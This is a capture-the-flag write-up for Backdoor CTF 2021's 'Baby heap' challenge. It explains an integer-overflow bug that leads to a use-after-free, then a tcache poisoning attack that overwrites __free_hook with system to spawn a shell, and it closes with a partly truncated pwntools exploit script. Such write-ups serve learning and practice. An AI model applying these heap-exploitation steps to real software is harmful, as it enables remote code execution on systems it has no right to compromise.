Baby heap
In Backdoor CTF 2021, 1 points
Let's get you all warmed up with a classic little 4-function heap challenge, with a twist ofc.
nc 17169
`` ``
Challenge files: baby-heap
As stated in the description, we can allocate, free, edit and view chunks. Sounds like a simple heap UAF/double free right? Let's look into the code.
When we allocate chunks, we can either allocate small (128 bytes), medium (512 bytes) or large (1040 bytes) chunks. This gives us access to both the tcache and unsort bins, which is really useful for leaking libc addresses and stuff.
The allocate_chunks
function is called to allocate chunks:
unsigned __int64 allocate_chunks(){
unsigned int v1; // [rsp+Ch] [rbp-14h] BYREF
int v2; // [rsp+10h] [rbp-10h] BYREF
unsigned int i; // [rsp+14h] [rbp-Ch]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
printf("How many chunks do you wanna allocate: ");
v1 = 0;
__isoc99_scanf("%u", &v1);
puts("Select the size: ");
v2 = 0;
__isoc99_scanf("%d", &v2);
for ( i = 0; i < v1; ++i ){
return __readfsqword(0x28u) ^ v4;
__int64 increment_a(){
return (unsigned int)++chunk_index_a;
The user specifies the number of chunks, as well as the chunk size by entering either 1, 2 or 3. For each chunk the user wants to create, chunk_index_a
is incremented and the allocate_chunk
function is called with the chunk size choice.
void __fastcall allocate_chunk(int choice)
int v1; // ebx
int v2; // [rsp+1Ch] [rbp-14h]
if ( choice == 3 ) {
v2 = 128;
} else {
if ( choice > 3 )
if ( choice == 1 ) {
v2 = 1040;
} else{
if ( choice != 2 )
v2 = 512;
if ( (unsigned int)chunk_index_b > 0x10 )
v1 = chunk_index_b++;
chunks[v1] = malloc(v2);
One thing to note is the function returns if choice > 3
, and there is no bounds checking elsewhere. If the choice is valid, chunk_index_b
is incremented and a chunk is malloc
ed and stored in the chunks array. Now, we have two variables that store the number of chunks allocated.
However, we can get these two variables to differ by entering a chunk size choice that is greater than 3. This will cause chunk_index_a
to be incremented, but allocate_chunk
will return before chunk_index_b++
is executed, so chunk_index_a
can be manipulated to be greater than chunk_index_b
Let's look at the free function now:
unsigned __int64 free_last_chunk(){
unsigned __int64 result; // rax
result = (unsigned int)chunk_index_b;
if ( chunk_index_b ) {
if ( chunk_index_a > (unsigned int)chunk_index_b ) {
fwrite("Hacking detected!!!
", 1uLL, 0x1FuLL, stderr);
free((void *)chunks[--chunk_index_b]);
result = (unsigned __int64)chunks;
chunks[chunk_index_a] = 0LL;
return result;
We're not allowed to specify an index to free, so we can only free the last allocated chunk. Also, chunk_index_a
must not be greater than chunk_index_b
, which disrupts the bug we found earlier. Additionally, the pointer to the freed chunk is zeroed out, so there is no use after free here. However, the freed chunk is indexed by chunk_index_b
, while chunk_index_a
controls which chunk is zeroed out. If we can these two variables to differ, we can get a use after free!
However, it seems this is prevented by the check that chunk_index_a <= chunk_index_b
. When dealing with these kinds of problems, there are usually 2 bugs to consider:
- behaviour with negative numbers/integer underflow
- behaviour with very large numbers (integer overflow)
If we can increment chunk_index_a
to a very large value, it will overflow and become 0. This value is around 4 billion, which means it will take quite a bit of time to run. Another problem is we need to ensure that chunk_index_a
is not negative and it doesn't overwrite any pointer we will need.
Anyway we've gone through all the bugs in this program, so let's go on to the exploit.
Our exploit will follow the general pattern of
- free large chunk to unsort bin
- read chunk metadata to leak libc base
- write chunk metadata of tcache chunk to
- malloc chunks until a pointer to one of the hooks is returned
- write one_gadget to that hook
- trigger one_gadget
- get shell!
For the exploit, I allocated a large (1040 byte) chunk and 2 small (128 byte) chunks. To ensure that chunk_index_a
is zeroing out chunk pointers that we don't need, I allocated 3 chunks (size doesn't matter here) before allocating the 3 chunks that we need.
At this point, both chunk indexes are 6.
Then, I "allocated" 4294967293
chunks of size 10
, which doesn't exist. This results in chunk_index_a
overflowing to 3, while chunk_index_b
remains 6. Thus, when we free the 3 active chunks (3,4,5), these chunks get freed, but the pointers to (0,1,2) get zeroed out instead.
Once we've freed these chunks, we can view the contents of chunk 3, which leaks the libc base. Then, we write __free_hook
to the next
pointer of chunk 4 (which is freed to the tcache). Thus, when we malloc
a couple of chunks, we will end up with a pointer to the __free_hook
At this point, chunk_index_a
is 0, while chunk_index_b
is 3. I then allocated 3 more small chunks (probably a bit too many), and found that chunk 4 points to __free_hook
We can then grab a one gadget and write its address to __free_hook
. Now, all we need to do is free a chunk, and we will get our shell!
Unfortunately, I couldn't find a suitable one gadget, since the rdx
register was polluted with some data from other function calls. I was stuck here for quite a while as I tried to use different methods to change the value of this register.
Eventually, I decided to try a new approach. Looking through the documentation for __free_hook
, it is actually called with $rdi=address of freed buffer
. Therefore, if we write the address of system
to __free_hook
and free a chunk that starts with the string /bin/sh
, we can get a shell! Fortunately, with a little bit of tweaking the heap layout, I was able to get this attack to work.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./babyHeap")
libc = ELF("./")
ld = ELF("./")
context.binary = exe
def malloc(num: int, size: int):
p.recvuntil('How many chunks do you wanna allocate:')
def view(index: int):
p.recvuntil('Index to view:')
def free():
def edit(index: int, size: int, data: bytes|str):
# Workaround for weird vs code bug
p.recvuntil('Index to edit:')
p.recvuntil('Enter size:')
def conn():
if args.LOCAL:
return process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})
return remote("", 17169)
q = None
def main():
r = conn()
e = elf
p = r
global q
q = p
leak = p.recvline(keepends=False)[1:]
print(leak, len(leak))
leak = u64(leak + b"\0\0")
libc.address = leak-0x1ebbe0
print(hex(leak), hex(libc.address))
print("Wrote free hook")
edit(4,9, p64(libc.sym.system))
if __name__ == "__main__":